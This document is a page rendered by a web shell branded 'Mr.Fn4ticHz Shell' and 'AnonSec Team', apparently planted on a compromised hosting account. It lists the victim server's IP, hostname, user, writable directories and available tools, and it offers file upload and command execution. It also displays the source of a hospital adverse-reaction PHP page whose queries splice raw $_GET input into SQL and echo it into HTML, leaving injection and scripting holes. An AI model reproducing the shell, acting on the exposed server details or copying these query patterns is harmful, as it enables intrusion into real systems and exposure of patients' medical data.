Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.138.120.187
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//show_Suspected_Reaction.php
      <?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		
}
?>
	  

  <?php


?>



<?php

?>  
<div class="container">
    <div class="row">
        <div class="col-sm-6">
            
        </div>
        <div class="col-sm-6">
            <a href="edit_showpage_Suspected_Reaction.php?prescriptionid=<?php echo $_GET['prescriptionid'] ?>&patientid=<?php echo $_GET['patientid'] ?>&surgeryid=<?php echo $_GET['surgeryid'] ?>" ><i class="fa fa-pencil-square-o" aria-hidden="true" style='font-size:20px;'></i>
</a>
        </div>
    </div>
</div>
  
    <?php
    $sql ="SELECT * FROM Suspected_Reaction WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		    echo "
<h3 align='center'>Suspected Reaction</h3>
 <table id='example2' class='table table-bordered table-hover'>
 ";
 		{
if($rs[Minor] == 'on'){
echo " <tr><td width='50%'>Minor Reaction: </td>
<td width='50%'>$rs[Minor_Reaction]</td></tr>
";
}
if($rs[Major] == 'on'){
echo " <tr><td width='50%'>Minor Reaction: </td>
<td width='50%'>$rs[Major_Reaction] <b> $rs[Specify]</b></td></tr>
";
}

echo"
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Name of Medicine : </td>
<td width='50%'>$rs[Name_Medicine]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Native description of Occurrence: </td>
<td width='50%'>$rs[Treatment_Given]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Outcome: </td>
<td width='50%'>$rs[Outcome]</td>
</tr>
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Corrective And Preventive Action Taken: </td>
<td width='50%'>$rs[Corrective_action]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Date and time of Recovery: </td>
<td width='50%'>$rs[Recovery_time]</td>
</tr>
";
}
}
?>

</table>


Anon7 - 2022
AnonSec Team